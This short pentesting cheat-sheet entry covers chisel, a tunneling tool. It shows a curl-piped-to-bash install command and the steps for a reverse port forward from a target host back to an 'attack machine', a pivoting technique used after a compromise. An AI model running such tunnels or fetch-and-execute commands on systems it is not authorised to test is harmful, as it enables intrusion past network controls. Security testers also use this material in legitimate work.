chisel
Repo: GitHub
Chisel is an actively maintained TCP/UDP tunneler written in Go. Self-described “fast TCP/UDP tunnel, transported over HTTP, secured via SSH”
Quick and easy install: curl https://i.jpillora.com/chisel! | bash
Port Forwarding
I want to setup port forwarding so that my attack machine (10.10.10.10) can access a target-locally-hosted port (e.g. 8000). How do I do that?
Start the server locally, listening on port 12345:
chisel server -p 12345 --reverse
Get a copy of chisel on to the target via whatever file transfer mechanism is easiest. Then connect from the target back to the server as a client:
./chisel client 10.10.10.10:12345 R:8000:localhost:8000
Now on the attack machine, connect locally to port 8000 for access to the target-local port 8000.